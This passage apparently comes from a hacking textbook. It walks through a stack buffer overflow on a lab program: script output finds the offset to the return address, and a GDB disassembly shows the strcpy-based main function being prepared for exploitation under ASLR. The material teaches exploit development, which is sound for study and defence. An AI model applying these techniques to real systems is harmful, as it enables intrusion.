Graphics Programs Reference
In-Depth Information
Trying offset of 13 words
buffer is at 0xbfe0fd80
Trying offset of 14 words
buffer is at 0xbfe03d70
Trying offset of 15 words
buffer is at 0xbfc2fb90
Trying offset of 16 words
buffer is at 0xbff32a40
Trying offset of 17 words
buffer is at 0xbf9da940
Trying offset of 18 words
buffer is at 0xbfd0cc70
Trying offset of 19 words
buffer is at 0xbf897ff0
Illegal instruction
==> Correct offset to return address is 19 words
r
eader@hacking:~/booksrc $
Knowing the proper offset will let us overwrite the return address.
However, we still cannot execute shellcode since its location is randomized.
Using GDB, let's look at the program just as it's about to return from the
main function.
reader@hacking:~/booksrc $ gdb -q ./aslr_demo
Using host libthread_db library "/lib/tls/i686/cmov/libthread_db.so.1".
(gdb) disass main
Dump of assembler code for function main:
0x080483b4 <main+0>: push ebp
0x080483b5 <main+1>: mov ebp,esp
0x080483b7 <main+3>: sub esp,0x58
0x080483ba <main+6>: and esp,0xfffffff0
0x080483bd <main+9>: mov eax,0x0
0x080483c2 <main+14>: sub esp,eax
0x080483c4 <main+16>: lea eax,[ebp-72]
0x080483c7 <main+19>: mov DWORD PTR [esp+4],eax
0x080483cb <main+23>: mov DWORD PTR [esp],0x80484d4
0x080483d2 <main+30>: call 0x80482d4 <printf@plt>
0x080483d7 <main+35>: cmp DWORD PTR [ebp+8],0x1
0x080483db <main+39>: jle 0x80483f4 <main+64>
0x080483dd <main+41>: mov eax,DWORD PTR [ebp+12]
0x080483e0 <main+44>: add eax,0x4
0x080483e3 <main+47>: mov eax,DWORD PTR [eax]
0x080483e5 <main+49>: mov DWORD PTR [esp+4],eax
0x080483e9 <main+53>: lea eax,[ebp-72]
0x080483ec <main+56>: mov DWORD PTR [esp],eax
0x080483ef <main+59>: call 0x80482c4 <strcpy@plt>
0x080483f4 <main+64>: mov eax,0x1
0x080483f9 <main+69>: leave
0x080483fa <main+70>: ret
End of assembler dump.
(gdb) break *0x080483fa
Breakpoint 1 at 0x80483fa: file aslr_demo.c, line 12.
(
gdb)
